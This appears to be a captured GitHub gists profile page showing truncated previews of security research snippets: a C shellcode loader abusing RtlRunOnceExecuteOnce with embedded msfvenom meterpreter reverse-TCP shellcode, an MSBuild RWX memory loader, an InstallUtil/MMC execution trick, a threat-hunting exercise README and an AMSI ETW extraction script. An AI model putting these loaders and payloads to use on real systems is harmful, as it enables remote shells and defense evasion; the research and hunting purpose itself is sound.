Skip to content

Instantly share code, notes, and snippets.

View joe-desimone's full-sized avatar

Joe Desimone joe-desimone

50 followers · 0 following
View GitHub Profile
@joe-desimone
joe-desimone / RtlRunOnceExecuteOnceShellcodeExec.c
Created April 6, 2023 14:02 — forked from paranoidninja/RtlRunOnceExecuteOnceShellcodeExec.c
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
#include <windows.h>
#include <stdio.h>
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);
// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
@joe-desimone
joe-desimone / README.md
Created October 17, 2022 14:17
Table Top With Teeth - Training Exercise

Instructions

The following script is designed to create artifacts that teams can use to hunt, new or interesting capabilities.

The following table top is based on the code here: https://github.com/code-scrap/DynamicWrapperDotNet

This script is self-contained. It should dynamically write a DLL to disk and load it in to cscript.exe

To Invoke cscript.exe stranger_things.js This example expects a 64bit system.

@joe-desimone
joe-desimone / gist:f2a3564e74621169540e26499c4588ad
Created September 21, 2022 22:51
MSBuild Property Functions - Load RWX Memory Mapped File
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@joe-desimone
joe-desimone / Snapit.cs
Created August 4, 2022 01:25
Snapit - MMC Installer, things
using Microsoft.ManagementConsole;
using System.ComponentModel;
using System;
using System.Security.Permissions;
using System.Collections;
/*
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /reference:C:\Windows\assembly\GAC_MSIL\microsoft.managementconsole\3.0.0.0__31bf3856ad364e35\microsoft.managementconsole.dll .\Snapit.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe SnapIt.dll
@joe-desimone
joe-desimone / AMSIScriptContentRetrieval.ps1
Created June 7, 2021 00:23 — forked from mattifestation/AMSIScriptContentRetrieval.ps1
PoC code used to demonstrate extracting script contents using the AMSI ETW provider
# Script author: Matt Graeber (@mattifestation)
# logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
# Do your malicious things here that would be logged by AMSI
# logman stop AMSITrace -ets
$OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture
$OSArch = $OSArchProperty.OSArchitecture
$OSPointerSize = 32
if ($OSArch -eq '64-bit') { $OSPointerSize = 64 }